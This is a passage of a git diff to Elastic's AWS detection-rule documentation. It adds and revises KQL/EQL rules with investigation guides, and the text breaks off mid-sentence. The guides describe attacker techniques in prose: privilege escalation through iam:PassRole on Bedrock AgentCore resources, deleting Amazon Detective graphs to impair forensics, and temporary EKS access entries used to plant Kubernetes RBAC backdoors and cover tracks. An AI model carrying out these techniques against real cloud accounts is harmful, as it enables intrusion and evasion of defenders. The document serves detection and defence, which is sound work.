include::rule-details/suspicious-process-creation-calltrace.asciidoc[] +include::rule-details/suspicious-process-execution-by-zoom.asciidoc[] include::rule-details/suspicious-process-execution-via-renamed-psexec-executable.asciidoc[] include::rule-details/suspicious-python-shell-command-execution.asciidoc[] include::rule-details/suspicious-rdp-activex-client-loaded.asciidoc[] include::rule-details/suspicious-react-server-child-process.asciidoc[] +include::rule-details/suspicious-reading-of-procfs-syscall-file.asciidoc[] include::rule-details/suspicious-remote-registry-access-via-sebackupprivilege.asciidoc[] include::rule-details/suspicious-renaming-of-esxi-files.asciidoc[] include::rule-details/suspicious-sip-check-by-macos-application.asciidoc[] @@ -1824,7 +1838,6 @@ include::rule-details/unusual-country-for-an-aws-command.asciidoc[] include::rule-details/unusual-d-bus-daemon-child-process.asciidoc[] include::rule-details/unusual-dns-activity.asciidoc[] include::rule-details/unusual-dpkg-execution.asciidoc[] -include::rule-details/unusual-discovery-signal-alert-with-unusual-process-command-line.asciidoc[] include::rule-details/unusual-discovery-signal-alert-with-unusual-process-executable.asciidoc[] include::rule-details/unusual-executable-file-creation-by-a-system-critical-process.asciidoc[] include::rule-details/unusual-execution-from-kernel-thread-kthreadd-parent.asciidoc[] diff --git a/docs/detections/prebuilt-rules/rule-details/aws-bedrock-agentcore-resource-created-with-iam-execution-role.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-bedrock-agentcore-resource-created-with-iam-execution-role.asciidoc new file mode 100644 index 0000000000..e8e6884668 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/aws-bedrock-agentcore-resource-created-with-iam-execution-role.asciidoc @@ -0,0 +1,131 @@ +[[aws-bedrock-agentcore-resource-created-with-iam-execution-role]] +=== AWS Bedrock AgentCore Resource Created with IAM Execution Role + +Detects the creation of an AWS Bedrock AgentCore resource (code interpreter, agent runtime, browser, or harness) with an IAM execution role attached. When an attacker with iam:PassRole permission creates an AgentCore resource and attaches a privileged role, subsequent invocations inside that resource execute as the attached role — enabling privilege escalation to roles that trust bedrock-agentcore.amazonaws.com. + +*Rule type*: query + +*Rule indices*: + +* logs-aws.cloudtrail-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.beyondtrust.com/blog/entry/aws-agentcore-privilege-escalation + +*Tags*: + +* Domain: Cloud +* Data Source: AWS +* Data Source: Amazon Web Services +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS Bedrock +* Service: AWS IAM +* Tactic: Privilege Escalation +* Tactic: Persistence +* Rule Type: Custom Query (KQL) +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS Bedrock AgentCore Resource Created with IAM Execution Role* + + +AWS Bedrock AgentCore services (code interpreters, agent runtimes, browsers, harnesses) run user workloads inside isolated MicroVMs. When an IAM role is attached at creation time, all code executing inside the resource assumes that role's identity. An attacker with iam:PassRole and bedrock-agentcore:Create* permissions can attach a privileged role and then invoke the resource to operate as that role. + +The four Create* events covered here are management-plane events logged to CloudTrail by default. The subsequent Start*/Invoke* data-plane events are NOT captured by the default management events trail and cannot be detected without enabling data-plane logging. + + +*Possible investigation steps* + + +- Check the caller identity (`aws.cloudtrail.user_identity.arn`) against expected provisioning principals. Unexpected users or roles creating AgentCore resources should be investigated. +- Examine `aws.cloudtrail.request_parameters` for the attached role ARN (`executionRoleArn` or `roleArn`) and evaluate whether that role has permissions beyond what the AgentCore workload legitimately requires. +- Check for subsequent `StartCodeInterpreterSession`, `StartBrowserSession`, or `InvokeAgentRuntime` events from the same caller against the newly created resource (requires data-plane logging to be enabled). +- Review the IAM PassRole permission of the calling identity and whether it is constrained by `iam:PassedToService` conditions. + + +*False positive analysis* + + +- Automated provisioning by CDK/CloudFormation/Terraform with a known service account. +- Platform engineering pipelines deploying Bedrock-based AI workloads. +- Filter on `user_agent.original` for known IaC tools. + + +*Response and remediation* + + +- Suspend the calling identity's iam:PassRole permission while investigating. +- Delete the newly created AgentCore resource to stop active sessions. +- Rotate the attached execution role's credentials if exploitation is confirmed. +- Enable data-plane logging for bedrock-agentcore to detect subsequent session invocations. + + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset: "aws.cloudtrail" and + event.provider: "bedrock-agentcore.amazonaws.com" and + event.action: ( + "CreateCodeInterpreter" or + "CreateAgentRuntime" or + "CreateBrowser" or + "CreateHarness" + ) and + event.outcome: "success" and + aws.cloudtrail.request_parameters: (*executionRoleArn* or *roleArn*) and + not aws.cloudtrail.user_identity.invoked_by: ("bedrock-agentcore.amazonaws.com" or "cloudformation.amazonaws.com") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ diff --git a/docs/detections/prebuilt-rules/rule-details/aws-bedrock-guardrail-deleted-or-weakened.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-bedrock-guardrail-deleted-or-weakened.asciidoc index 6a20e17970..20365a96db 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-bedrock-guardrail-deleted-or-weakened.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-bedrock-guardrail-deleted-or-weakened.asciidoc @@ -28,16 +28,15 @@ Detects deletion, weakening, or version management of AWS Bedrock guardrails via *Tags*: * Domain: Cloud -* Domain: LLM -* Data Source: AWS +* Domain: GenAI +* Platform: AWS * Data Source: AWS CloudTrail -* Data Source: Amazon Web Services -* Data Source: Amazon Bedrock -* Use Case: Threat Detection -* Resources: Investigation Guide +* Service: AWS Bedrock * Tactic: Defense Evasion +* Rule Type: Custom Query (KQL) +* Resources: Investigation Guide -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -108,6 +107,7 @@ data_stream.dataset: "aws.cloudtrail" "DeleteEnforcedGuardrailConfiguration" or "PutEnforcedGuardrailConfiguration" ) and event.outcome: "success" + and not user_agent.original: (*Terraform*) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/aws-cloudtrail-log-updated.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-cloudtrail-log-updated.asciidoc index 6839f26622..36502c82e8 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-cloudtrail-log-updated.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-cloudtrail-log-updated.asciidoc @@ -28,14 +28,13 @@ Detects updates to an existing CloudTrail trail via UpdateTrail API which may re *Tags*: * Domain: Cloud -* Data Source: AWS -* Data Source: Amazon Web Services -* Data Source: AWS Cloudtrail -* Use Case: Log Auditing -* Resources: Investigation Guide +* Platform: AWS +* Data Source: AWS CloudTrail * Tactic: Impact +* Rule Type: Custom Query (KQL) +* Resources: Investigation Guide -*Version*: 216 +*Version*: 217 *Rule authors*: @@ -103,6 +102,7 @@ data_stream.dataset: "aws.cloudtrail" and event.provider: "cloudtrail.amazonaws.com" and event.action: "UpdateTrail" and event.outcome: "success" + and not user_agent.original: (*Pulumi* or *Terraform*) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/aws-cloudwatch-alarm-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-cloudwatch-alarm-deletion.asciidoc index 0dc1bc5924..c329bffcf7 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-cloudwatch-alarm-deletion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-cloudwatch-alarm-deletion.asciidoc @@ -28,13 +28,14 @@ Detects the deletion of one or more Amazon CloudWatch alarms using the "DeleteAl *Tags*: * Domain: Cloud -* Data Source: AWS -* Data Source: Amazon Web Services -* Data Source: Amazon CloudWatch -* Resources: Investigation Guide +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS CloudWatch * Tactic: Defense Evasion +* Rule Type: Custom Query (KQL) +* Resources: Investigation Guide -*Version*: 214 +*Version*: 215 *Rule authors*: @@ -143,7 +144,7 @@ data_stream.dataset: "aws.cloudtrail" and event.action: "DeleteAlarms" and event.outcome: "success" and source.ip: * - and not user_agent.original : "AWS Internal" + and not user_agent.original : ("AWS Internal" or "dynamodb.application-autoscaling.amazonaws.com" or "application-autoscaling.amazonaws.com" or *Terraform* or *Pulumi*) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/aws-cloudwatch-log-group-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-cloudwatch-log-group-deletion.asciidoc index ebd5d42d6f..79048037cc 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-cloudwatch-log-group-deletion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-cloudwatch-log-group-deletion.asciidoc @@ -28,15 +28,15 @@ Detects the deletion of an Amazon CloudWatch Log Group using the "DeleteLogGroup *Tags*: * Domain: Cloud -* Data Source: AWS -* Data Source: Amazon Web Services -* Data Source: Amazon CloudWatch -* Use Case: Log Auditing -* Resources: Investigation Guide +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS CloudWatch * Tactic: Defense Evasion * Tactic: Impact +* Rule Type: Custom Query (KQL) +* Resources: Investigation Guide -*Version*: 215 +*Version*: 216 *Rule authors*: @@ -163,7 +163,7 @@ data_stream.dataset: "aws.cloudtrail" and event.action: "DeleteLogGroup" and event.outcome: "success" and source.ip: * - and not user_agent.original : "AWS Internal" + and not user_agent.original : ("AWS Internal" or *Terraform* or *Pulumi*) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/aws-cloudwatch-log-stream-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-cloudwatch-log-stream-deletion.asciidoc index 33b3b0664a..6f05ad88d3 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-cloudwatch-log-stream-deletion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-cloudwatch-log-stream-deletion.asciidoc @@ -28,15 +28,15 @@ Detects the deletion of an Amazon CloudWatch log stream using the "DeleteLogStre *Tags*: * Domain: Cloud -* Data Source: AWS -* Data Source: Amazon Web Services -* Data Source: Amazon CloudWatch -* Use Case: Log Auditing +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS CloudWatch * Tactic: Defense Evasion * Tactic: Impact +* Rule Type: Custom Query (KQL) * Resources: Investigation Guide -*Version*: 215 +*Version*: 216 *Rule authors*: @@ -152,7 +152,7 @@ data_stream.dataset: "aws.cloudtrail" and event.action: "DeleteLogStream" and event.outcome: "success" and source.ip: * - and not user_agent.original : "AWS Internal" + and not user_agent.original: ("AWS Internal" or *Terraform* or *Pulumi*) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/aws-config-resource-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-config-resource-deletion.asciidoc index ae92cb392d..61661d9b43 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-config-resource-deletion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-config-resource-deletion.asciidoc @@ -28,13 +28,14 @@ Identifies attempts to delete AWS Config resources. AWS Config provides continuo *Tags*: * Domain: Cloud -* Data Source: AWS -* Data Source: Amazon Web Services -* Data Source: AWS Config -* Resources: Investigation Guide +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS Config * Tactic: Defense Evasion +* Rule Type: Custom Query (KQL) +* Resources: Investigation Guide -*Version*: 214 +*Version*: 215 *Rule authors*: @@ -145,6 +146,7 @@ data_stream.dataset: aws.cloudtrail DeleteConfigurationRecorder or DeleteConformancePack or DeleteOrganizationConformancePack or DeleteDeliveryChannel or DeleteRemediationConfiguration or DeleteRetentionConfiguration) and not aws.cloudtrail.user_identity.invoked_by: (securityhub.amazonaws.com or fms.amazonaws.com or controltower.amazonaws.com or config-conforms.amazonaws.com) + and not user_agent.original: (*Pulumi* or *Terraform*) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/aws-detective-graph-deleted.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-detective-graph-deleted.asciidoc new file mode 100644 index 0000000000..e990da04dd --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/aws-detective-graph-deleted.asciidoc @@ -0,0 +1,113 @@ +[[aws-detective-graph-deleted]] +=== AWS Detective Graph Deleted + +Detects the deletion of an Amazon Detective behavior graph via the DeleteGraph API. Amazon Detective automatically collects log data from AWS services and uses machine learning, statistical analysis, and graph theory to build an interactive model of resource behaviors and interactions. Deleting a behavior graph destroys its historical analysis data and removes the ability to investigate security incidents using Detective's relationship mapping. An attacker with sufficient IAM permissions may delete the Detective graph to impair forensic investigation of a compromise. + +*Rule type*: query + +*Rule indices*: + +* logs-aws.cloudtrail-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.aws.amazon.com/detective/latest/APIReference/API_DeleteGraph.html + +*Tags*: + +* Domain: Cloud +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS Detective +* Rule Type: Custom Query (KQL) +* Tactic: Defense Evasion +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS Detective Graph Deleted* + + +Amazon Detective builds a behavior graph from CloudTrail, VPC Flow Logs, and GuardDuty findings, enabling investigation teams to trace the full scope and timeline of a security incident. `DeleteGraph` is a rare, irreversible operation — the historical graph data cannot be recovered after deletion. An adversary who deletes the Detective graph removes a key forensic investigation tool, making it harder to understand the scope of a compromise. + + +*Possible investigation steps* + + +- Identify the caller in `aws.cloudtrail.user_identity.arn` and `user.name`. Confirm whether this is an authorized cloud administrator or an anomalous identity. +- Check whether the deletion was preceded by other defense-evasion actions in the same time window: GuardDuty detector deletion, CloudTrail StopLogging, Security Hub disable. +- Determine how long the Detective graph had been active and what historical data was lost. +- Review all IAM actions by this identity in the 24 hours before the deletion. + + +*False positive analysis* + + +- Account decommissioning workflows may include Detective graph deletion as part of teardown. Verify via change management records. + + +*Response and remediation* + + +- Re-enable Amazon Detective for the affected account and region. +- Reconstruct investigation context from raw CloudTrail, VPC Flow Logs, and GuardDuty findings. +- Revoke active sessions for the deleting identity if the action was unauthorized. +- Add an SCP restricting `detective:DeleteGraph` to break-glass administrator roles. + + +==== Setup + + +The AWS integration must be ingesting management events into `logs-aws.cloudtrail-*`. Amazon Detective must be enabled in the account for this event to appear. + +==== Rule query + + +[source, js] +---------------------------------- +data_stream.dataset: "aws.cloudtrail" + and event.provider: "detective.amazonaws.com" + and event.action: "DeleteGraph" + and event.outcome: "success" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/aws-ec2-ami-shared-with-another-account.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-ec2-ami-shared-with-another-account.asciidoc index 00540a5721..47c08ca291 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-ec2-ami-shared-with-another-account.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-ec2-ami-shared-with-another-account.asciidoc @@ -29,14 +29,14 @@ Identifies an AWS Amazon Machine Image (AMI) being shared with another AWS accou *Tags*: * Domain: Cloud -* Data Source: AWS -* Data Source: Amazon Web Services -* Data Source: AWS EC2 -* Use Case: Threat Detection +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS EC2 * Tactic: Exfiltration +* Rule Type: Custom Query (KQL) * Resources: Investigation Guide -*Version*: 8 +*Version*: 9 *Rule authors*: @@ -105,6 +105,7 @@ data_stream.dataset: "aws.cloudtrail" and event.provider: "ec2.amazonaws.com" and event.action: ModifyImageAttribute and event.outcome: success and aws.cloudtrail.request_parameters: *add=* and not aws.cloudtrail.user_identity.invoked_by: "assets.marketplace.amazonaws.com" + and not user_agent.original: (*packer-plugin-amazon* or *Ansible*) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/aws-ec2-ebs-snapshot-access-removed.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-ec2-ebs-snapshot-access-removed.asciidoc index 302a1f14b5..0bf53ca7bb 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-ec2-ebs-snapshot-access-removed.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-ec2-ebs-snapshot-access-removed.asciidoc @@ -28,14 +28,14 @@ Identifies the removal of access permissions from a shared AWS EC2 EBS snapshot. *Tags*: * Domain: Cloud -* Data Source: AWS -* Data Source: Amazon Web Services -* Data Source: AWS EC2 -* Use Case: Threat Detection +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS EC2 * Tactic: Impact +* Rule Type: Event Correlation (EQL) * Resources: Investigation Guide -*Version*: 7 +*Version*: 8 *Rule authors*: @@ -137,6 +137,7 @@ info where data_stream.dataset == "aws.cloudtrail" and stringContains (aws.cloudtrail.request_parameters, "attributeType=CREATE_VOLUME_PERMISSION") and stringContains (aws.cloudtrail.request_parameters, "remove=") and not source.address == "backup.amazonaws.com" + and not user_agent.original like~ ("*Terraform*", "*Pulumi*") ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/aws-ec2-encryption-disabled.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-ec2-encryption-disabled.asciidoc index 54a2f45257..f7ecf107c6 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-ec2-encryption-disabled.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-ec2-encryption-disabled.asciidoc @@ -29,13 +29,14 @@ Detects when Amazon Elastic Block Store (EBS) encryption by default is disabled *Tags*: * Domain: Cloud -* Data Source: AWS -* Data Source: Amazon Web Services -* Data Source: AWS EC2 +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS EC2 * Tactic: Impact +* Rule Type: Custom Query (KQL) * Resources: Investigation Guide -*Version*: 213 +*Version*: 214 *Rule authors*: @@ -139,6 +140,7 @@ If confirmed as expected, document the change request, implementation window, an [source, js] ---------------------------------- data_stream.dataset:aws.cloudtrail and event.provider:ec2.amazonaws.com and event.action:DisableEbsEncryptionByDefault and event.outcome:success + and not user_agent.original: (*Terraform*) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/aws-ec2-instance-interaction-with-iam-service.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-ec2-instance-interaction-with-iam-service.asciidoc index bbb8bc9f6c..e82683cb90 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-ec2-instance-interaction-with-iam-service.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-ec2-instance-interaction-with-iam-service.asciidoc @@ -27,16 +27,15 @@ Identifies when an EC2 instance interacts with the AWS IAM service via an assume *Tags*: * Domain: Cloud -* Data Source: AWS -* Data Source: Amazon Web Services -* Data Source: AWS EC2 -* Data Source: AWS IAM -* Use Case: Identity and Access Audit -* Tactic: Privilege Escalation +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS EC2 +* Service: AWS IAM * Tactic: Persistence +* Tactic: Privilege Escalation * Rule Type: BBR -*Version*: 4 +*Version*: 5 *Rule authors*: @@ -65,6 +64,7 @@ any where event.dataset == "aws.cloudtrail" or startsWith(event.action, "Put") or startsWith(event.action, "Tag") ) + and not user_agent.original like~ ("*Terraform*", "*Pulumi*", "*Ansible*") ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/aws-ec2-network-access-control-list-creation.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-ec2-network-access-control-list-creation.asciidoc index b2541d5ce2..d1379ad740 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-ec2-network-access-control-list-creation.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-ec2-network-access-control-list-creation.asciidoc @@ -30,15 +30,15 @@ Identifies the creation of an AWS EC2 network access control list (ACL) or an en *Tags*: * Domain: Cloud -* Data Source: AWS -* Data Source: Amazon Web Services -* Data Source: AWS EC2 -* Use Case: Network Security Monitoring -* Tactic: Persistence +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS EC2 * Tactic: Defense Evasion +* Tactic: Persistence +* Rule Type: Custom Query (KQL) * Resources: Investigation Guide -*Version*: 213 +*Version*: 214 *Rule authors*: @@ -101,6 +101,7 @@ AWS EC2 Network ACLs are stateless firewalls for controlling inbound and outboun [source, js] ---------------------------------- data_stream.dataset:aws.cloudtrail and event.provider:ec2.amazonaws.com and event.action:(CreateNetworkAcl or CreateNetworkAclEntry) and event.outcome:success + and not user_agent.original: (*Terraform* or *Pulumi* or *Ansible*) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/aws-ec2-network-access-control-list-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-ec2-network-access-control-list-deletion.asciidoc index c15b461a3c..b71035013b 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-ec2-network-access-control-list-deletion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-ec2-network-access-control-list-deletion.asciidoc @@ -30,14 +30,14 @@ Identifies the deletion of an Amazon Elastic Compute Cloud (EC2) network access *Tags*: * Domain: Cloud -* Data Source: AWS -* Data Source: Amazon Web Services -* Data Source: AWS EC2 -* Use Case: Network Security Monitoring +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS EC2 * Tactic: Defense Evasion +* Rule Type: Custom Query (KQL) * Resources: Investigation Guide -*Version*: 212 +*Version*: 213 *Rule authors*: @@ -103,6 +103,7 @@ The AWS Fleet integration, Filebeat module, or similarly structured data is requ [source, js] ---------------------------------- data_stream.dataset:aws.cloudtrail and event.provider:ec2.amazonaws.com and event.action:(DeleteNetworkAcl or DeleteNetworkAclEntry) and event.outcome:success + and not user_agent.original: (*Terraform* or *Pulumi* or *Ansible*) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/aws-ec2-route-table-created.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-ec2-route-table-created.asciidoc index db131ff97c..0a87a28d59 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-ec2-route-table-created.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-ec2-route-table-created.asciidoc @@ -29,14 +29,14 @@ Identifies when an EC2 Route Table has been created. Route tables can be used by *Tags*: * Domain: Cloud -* Data Source: AWS -* Data Source: Amazon Web Services -* Data Source: AWS EC2 -* Use Case: Network Security Monitoring +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS EC2 * Tactic: Persistence +* Rule Type: New Terms * Resources: Investigation Guide -*Version*: 214 +*Version*: 215 *Rule authors*: @@ -107,6 +107,7 @@ data_stream.dataset: "aws.cloudtrail" "CreateRouteTable" ) and event.outcome: "success" + and not user_agent.original: (*Terraform* or *Pulumi*) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/aws-ec2-security-group-configuration-change.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-ec2-security-group-configuration-change.asciidoc index ecce1488d2..7bd8e3baeb 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-ec2-security-group-configuration-change.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-ec2-security-group-configuration-change.asciidoc @@ -27,15 +27,15 @@ Identifies a change to an AWS Security Group Configuration. A security group is *Tags*: * Domain: Cloud -* Data Source: AWS -* Data Source: Amazon Web Services -* Data Source: AWS EC2 -* Use Case: Network Security Monitoring -* Resources: Investigation Guide -* Tactic: Persistence +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS EC2 * Tactic: Defense Evasion +* Tactic: Persistence +* Rule Type: Custom Query (KQL) +* Resources: Investigation Guide -*Version*: 214 +*Version*: 215 *Rule authors*: @@ -124,6 +124,7 @@ data_stream.dataset: "aws.cloudtrail" "RevokeSecurityGroupEgress" or "RevokeSecurityGroupIngress") or (event.action: "ModifyInstanceAttribute" and aws.cloudtrail.flattened.request_parameters.groupSet.items.groupId:*)) + and not user_agent.original: (*Terraform* or *Pulumi* or *Ansible*) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/aws-ec2-user-data-retrieval-for-ec2-instance.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-ec2-user-data-retrieval-for-ec2-instance.asciidoc index 1ba31b43a1..01625234e2 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-ec2-user-data-retrieval-for-ec2-instance.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-ec2-user-data-retrieval-for-ec2-instance.asciidoc @@ -28,14 +28,14 @@ Identifies discovery request DescribeInstanceAttribute with the attribute userDa *Tags*: * Domain: Cloud -* Data Source: AWS -* Data Source: Amazon Web Services -* Data Source: Amazon EC2 -* Resources: Investigation Guide -* Use Case: Log Auditing +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS EC2 * Tactic: Discovery +* Rule Type: New Terms +* Resources: Investigation Guide -*Version*: 9 +*Version*: 10 *Rule authors*: @@ -122,6 +122,7 @@ data_stream.dataset: "aws.cloudtrail" "elasticmapreduce.amazonaws.com" or "aiops.amazonaws.com" ) + and not user_agent.original: (*Terraform*) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/aws-efs-file-system-deleted.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-efs-file-system-deleted.asciidoc index 199711615d..82aabd0a3d 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-efs-file-system-deleted.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-efs-file-system-deleted.asciidoc @@ -28,13 +28,14 @@ Identifies the deletion of an Amazon EFS file system using the "DeleteFileSystem *Tags*: * Domain: Cloud -* Data Source: AWS -* Data Source: Amazon Web Services -* Data Source: AWS EFS +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS EFS * Tactic: Impact +* Rule Type: Custom Query (KQL) * Resources: Investigation Guide -*Version*: 212 +*Version*: 213 *Rule authors*: @@ -156,6 +157,7 @@ data_stream.dataset: "aws.cloudtrail" and event.provider: "elasticfilesystem.amazonaws.com" and event.action: "DeleteFileSystem" and event.outcome: "success" + and not user_agent.original: (*Terraform* or *Pulumi*) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/aws-eks-access-entry-created-then-deleted-by-same-identity.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-eks-access-entry-created-then-deleted-by-same-identity.asciidoc new file mode 100644 index 0000000000..79edb4095f --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/aws-eks-access-entry-created-then-deleted-by-same-identity.asciidoc @@ -0,0 +1,126 @@ +[[aws-eks-access-entry-created-then-deleted-by-same-identity]] +=== AWS EKS Access Entry Created Then Deleted by Same Identity + +Detects the creation of an Amazon EKS access entry followed by its deletion by the same identity within a short time window. EKS access entries define Kubernetes RBAC-level permissions for IAM principals in an EKS cluster. An adversary with EKS administrative access may temporarily grant themselves cluster access, use those permissions to create Kubernetes RBAC resources (ClusterRoleBindings, ServiceAccounts with privileged roles), and then delete the access entry to hide the evidence of the initial grant while retaining access through the Kubernetes-level backdoor. + +*Rule type*: eql + +*Rule indices*: + +* logs-aws.cloudtrail-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-15m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.aws.amazon.com/eks/latest/APIReference/API_CreateAccessEntry.html +* https://docs.aws.amazon.com/eks/latest/APIReference/API_DeleteAccessEntry.html +* https://www.wiz.io/blog/new-attack-vectors-emerge-via-recent-eks-access-entries-and-pod-identity-features +* https://securitylabs.datadoghq.com/articles/eks-cluster-access-management-deep-dive/ + +*Tags*: + +* Domain: Cloud +* Domain: Kubernetes +* Platform: AWS +* Platform: Kubernetes +* Data Source: AWS CloudTrail +* Service: AWS EKS +* Rule Type: Event Correlation (EQL) +* Tactic: Persistence +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS EKS Access Entry Created Then Deleted by Same Identity* + + +EKS access entries (introduced in EKS API mode) map IAM principals to Kubernetes access policies or allow associating Kubernetes groups to IAM principals. An adversary who obtains `eks:CreateAccessEntry` and `eks:DeleteAccessEntry` permissions can: + +1. Create an access entry for their own IAM principal with cluster-admin level access. +2. Use that access to create persistent Kubernetes RBAC resources (ClusterRoleBindings, privileged ServiceAccounts, rogue DaemonSets). +3. Delete the access entry, removing the CloudTrail evidence of the initial grant while retaining Kubernetes-level access. + +This sequence is analogous to adding a backdoor user, using it, then deleting it to cover tracks. The deletion within a short window of creation is the key behavioral indicator. + + +*Possible investigation steps* + + +- Identify the calling identity from `aws.cloudtrail.user_identity.arn` and the targeted cluster from 